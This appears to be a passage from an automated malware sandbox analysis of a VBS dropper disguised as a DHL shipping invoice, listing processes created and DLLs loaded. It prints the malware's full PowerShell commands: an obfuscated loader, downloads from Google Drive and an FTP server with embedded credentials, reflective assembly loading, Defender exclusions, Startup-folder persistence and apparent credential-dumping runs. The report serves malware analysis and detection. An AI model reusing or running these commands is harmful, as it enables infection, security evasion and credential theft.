'tAGUAdA' + [char]66 + 'zAHkAUw' + [char]66 + 'bACAAPQAgAGcAbg' + [char]66 + 'pAGQAbw' + [char]66 + 'jAG4ARQAuAGcAag' + [char]66 + 'nAGYAegAkADsAKQ' + [char]66 + '0AG4AZQ' + [char]66 + 'pAGwAQw' + [char]66 + 'iAGUAVwAuAHQAZQ' + [char]66 + 'OACAAdA' + [char]66 + 'jAGUAag' + [char]66 + 'iAE8ALQ' + [char]66 + '3AGUATgAoACAAPQAgAGcAag' + [char]66 + 'nAGYAegAkADsAKQAoAGUAcw' + [char]66 + 'vAHAAcw' + [char]66 + 'pAGQALg' + [char]66 + 'nAGoAZw' + [char]66 + 'mAHoAJAA7ACkAIAAnAHQAeA
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $QDrfV = $host.Version.Major.Equals(2) ;if ( $QDrfV ) {$TZWou = [System.IO.Path]::GetTempPath();del ( $TZWou + '\Upwin.msu' );$ylfyq = 'https://drive.google.com/uc?export=download&id=';$qVgWD = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $qVgWD ) {$ylfyq = ($ylfyq + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$ylfyq = ($ylfyq + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$mjnby = (New-Object Net.WebClient);$mjnby.Encoding = [System.Text.Encoding]::UTF8;$mjnby.DownloadFile($URLKB, $TZWou + '\Upwin.msu');$mcYDf = ('C:\Users\' + [Environment]::UserName );tkplB = ($TZWou + '\Upwin.msu'); powershell.exe wusa.exe tkplB /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\DHL_Shipping_Invoices_Awb_0000000.vbs' -Destination ( $mcYDf + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$zfgjg = (New-Object Net.WebClient);$zfgjg.Encoding = [System.Text.Encoding]::UTF8;$zfgjg.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578Jp@@');$lBCzSg = $zfgjg.DownloadString( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt' );$zfgjg.dispose();$zfgjg = (New-Object Net.WebClient);$zfgjg.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $zfgjg.DownloadString( $lBCzSg );$huUPX = 'C:\Users\user\Desktop\DHL_Shipping_Invoices_Awb_0000000.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '?:?' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( 'txt.cnisms/cangoc/snigulp/tnetnoc-pw/rb.moc.igelebs//:ptth' , $huUPX , 'D D1D' ) );};"
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $S = 'C:\Windows\System32\WindowsPowerShell\v1.0' ; Add-MpPreference -ExclusionPath $S -force ;
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $S = 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe' ; Add-MpPreference -ExclusionPath $S -force ;
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c mkdir "C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\"
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -file "C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\\x2.ps1"
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\uxrsw.ps1"
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c del "C:\Users\user\Desktop\DHL_Shipping_Invoices_Awb_0000000.vbs"
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                      Source: unknownProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\uxrsw.ps1' ";exit
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\uxrsw.ps1' ";exit
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe /stext "C:\Users\user\AppData\Local\Temp\ojhkcpeuacbdoxkfkfvppkwbxin"
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe /stext "C:\Users\user\AppData\Local\Temp\rlnddhpowkupylgjcqiqswqsgxxajh"
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe /stext "C:\Users\user\AppData\Local\Temp\rlnddhpowkupylgjcqiqswqsgxxajh"
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe /stext "C:\Users\user\AppData\Local\Temp\bfaoezapjsmubrunlbusdjlbpdpjcsomhv"
                      Source: unknownProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\uxrsw.ps1' ";exit
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\uxrsw.ps1' ";exit
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $qKKzc = 'Ow' + [char]66 + '9ADsAKQAgACkAIAAnAEQAMQ' + [char]66 + 'EACAARAAnACAALAAgAFgAUA' + [char]66 + 'VAHUAaAAkACAALAAgACcAaA' + [char]66 + '0AHQAcAA6AC8ALw' + [char]66 + 'zAGIAZQ' + [char]66 + 'sAGUAZw' + [char]66 + 'pAC4AYw' + [char]66 + 'vAG0ALg' + [char]66 + 'iAHIALw' + [char]66 + '3AHAALQ' + [char]66 + 'jAG8Abg' + [char]66 + '0AGUAbg' + [char]66 + '0AC8AcA' + [char]66 + 'sAHUAZw' + [char]66 + 'pAG4AcwAvAGMAbw' + [char]66 + 'nAG4AYQ' + [char]66 + 'jAC8Acw' + [char]66 + 'tAHMAaQ' + [char]66 + 'uAGMALg' + [char]66 + '0AHgAdAAnACAAKAAgAF0AXQ' + [char]66 + 'bAHQAYw' + [char]66 + 'lAGoAYg' + [char]66 + 'vAFsAIAAsACAAbA' + [char]66 + 'sAHUAbgAkACAAKA' + [char]66 + 'lAGsAbw' + [char]66 + '2AG4ASQAuACkAIAAnAEkAVg' + [char]66 + 'GAHIAcAAnACAAKA' + [char]66 + 'kAG8AaA' + [char]66 + '0AGUATQ' + [char]66 + '0AGUARwAuACkAJwAxAHMAcw' + [char]66 + 'hAGwAQwAuADMAeQ' + [char]66 + 'yAGEAcg' + [char]66 + 'iAGkATA' + [char]66 + 'zAHMAYQ' + [char]66 + 'sAEMAJwAoAGUAcA' + [char]66 + '5AFQAdA' + [char]66 + 'lAEcALgApACAAWg' + [char]66 + 'jAEIAYw' + [char]66 + 'hACQAIAAoAGQAYQ' + [char]66 + 'vAEwALg' + [char]66 + 'uAGkAYQ' + [char]66 + 'tAG8ARA' + [char]66 + '0AG4AZQ' + [char]66 + 'yAHIAdQ' + [char]66 + 'DADoAOg' + [char]66 + 'dAG4AaQ' + [char]66 + 'hAG0Abw' + [char]66 + 'EAHAAcA' + [char]66 + '' + [char]66 + 'AC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwA7ACkAIAApACAAJw' + [char]66 + '' + [char]66 + 'ACcAIAAsACAAJwCTIToAkyEnACAAKA' + [char]66 + 'lAGMAYQ' + [char]66 + 'sAHAAZQ' + [char]66 + 'SAC4AZw' + [char]66 + 'TAHoAQw' + [char]66 + 'CAGwAJAAgACgAZw' + [char]66 + 'uAGkAcg' + [char]66 + '0AFMANAA2AGUAcw' + [char]66 + 'hAEIAbQ' + [char]66 + 'vAHIARgA6ADoAXQ' + [char]66 + '0AHIAZQ' + [char]66 + '2AG4Abw' + [char]66 + 'DAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgAD0AIA' + [char]66 + 'aAGMAQg' + [char]66 + 'jAGEAJAAgAF0AXQ' + [char]66 + 'bAGUAdA' + [char]66 + '5AEIAWwA7ACcAJQ' + [char]66 + 'JAGgAcQ' + [char]66 + 'SAFgAJQAnACAAPQAgAFgAUA' + [char]66 + 'VAHUAaAAkADsAKQAgAGcAUw' + [char]66 + '6AEMAQg' + [char]66 + 'sACQAIAAoAGcAbg' + [char]66 + 'pAHIAdA' + [char]66 + 'TAGQAYQ' + [char]66 + 'vAGwAbg' + [char]66 + '3AG8ARAAuAGcAag' + [char]66 + 'nAGYAegAkACAAPQAgAGcAUw' + [char]66 + '6AEMAQg' + [char]66 + 'sACQAOwA4AEYAVA' + [char]66 + 'VADoAOg' + [char]66 + 'dAGcAbg' + [char]66 + 'pAGQAbw' + [char]66 + 'jAG4ARQAuAHQAeA' + [char]66 + 'lAFQALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUw' + [char]66 + 'bACAAPQAgAGcAbg' + [char]66 + 'pAGQAbw' + [char]66 + 'jAG4ARQAuAGcAag' + [char]66 + 'nAGYAegAkADsAKQ' + [char]66 + '0AG4AZQ' + [char]66 + 'pAGwAQw' + [char]66 + 'iAGUAVwAuAHQAZQ' + [char]66 + 'OACAAdA' + [char]66 + 'jAGUAag' + [char]66 + 'iAE8ALQ' + [char]66 + '3AGUATgAoACAAPQAgAGcAag' + [char]66 + 'nAGYAegAkADsAKQAoAGUAcw' + [char]66 + 'vAHAAcw' + [char]66 + 'pAGQALg' + [char]66 + 'nAGoAZw' + [char]66 + 'mAHoAJAA7ACkAIAAnAHQAeAJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $QDrfV = $host.Version.Major.Equals(2) ;if ( $QDrfV ) {$TZWou = [System.IO.Path]::GetTempPath();del ( $TZWou + '\Upwin.msu' );$ylfyq = 'https://drive.google.com/uc?export=download&id=';$qVgWD = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $qVgWD ) {$ylfyq = ($ylfyq + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$ylfyq = ($ylfyq + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$mjnby = (New-Object Net.WebClient);$mjnby.Encoding = [System.Text.Encoding]::UTF8;$mjnby.DownloadFile($URLKB, $TZWou + '\Upwin.msu');$mcYDf = ('C:\Users\' + [Environment]::UserName );tkplB = ($TZWou + '\Upwin.msu'); powershell.exe wusa.exe tkplB /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\DHL_Shipping_Invoices_Awb_0000000.vbs' -Destination ( $mcYDf + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$zfgjg = (New-Object Net.WebClient);$zfgjg.Encoding = [System.Text.Encoding]::UTF8;$zfgjg.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578Jp@@');$lBCzSg = $zfgjg.DownloadString( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt' );$zfgjg.dispose();$zfgjg = (New-Object Net.WebClient);$zfgjg.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $zfgjg.DownloadString( $lBCzSg );$huUPX = 'C:\Users\user\Desktop\DHL_Shipping_Invoices_Awb_0000000.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '?:?' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( 'txt.cnisms/cangoc/snigulp/tnetnoc-pw/rb.moc.igelebs//:ptth' , $huUPX , 'D D1D' ) );};"Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $S = 'C:\Windows\System32\WindowsPowerShell\v1.0' ; Add-MpPreference -ExclusionPath $S -force ;Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $S = 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe' ; Add-MpPreference -ExclusionPath $S -force ;Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c mkdir "C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\"Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -file "C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\\x2.ps1"Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\uxrsw.ps1"Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c del "C:\Users\user\Desktop\DHL_Shipping_Invoices_Awb_0000000.vbs"Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe /stext "C:\Users\user\AppData\Local\Temp\ojhkcpeuacbdoxkfkfvppkwbxin"
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe /stext "C:\Users\user\AppData\Local\Temp\rlnddhpowkupylgjcqiqswqsgxxajh"
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe /stext "C:\Users\user\AppData\Local\Temp\rlnddhpowkupylgjcqiqswqsgxxajh"
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe /stext "C:\Users\user\AppData\Local\Temp\bfaoezapjsmubrunlbusdjlbpdpjcsomhv"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\uxrsw.ps1' ";exit
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\uxrsw.ps1' ";exit
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                      Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
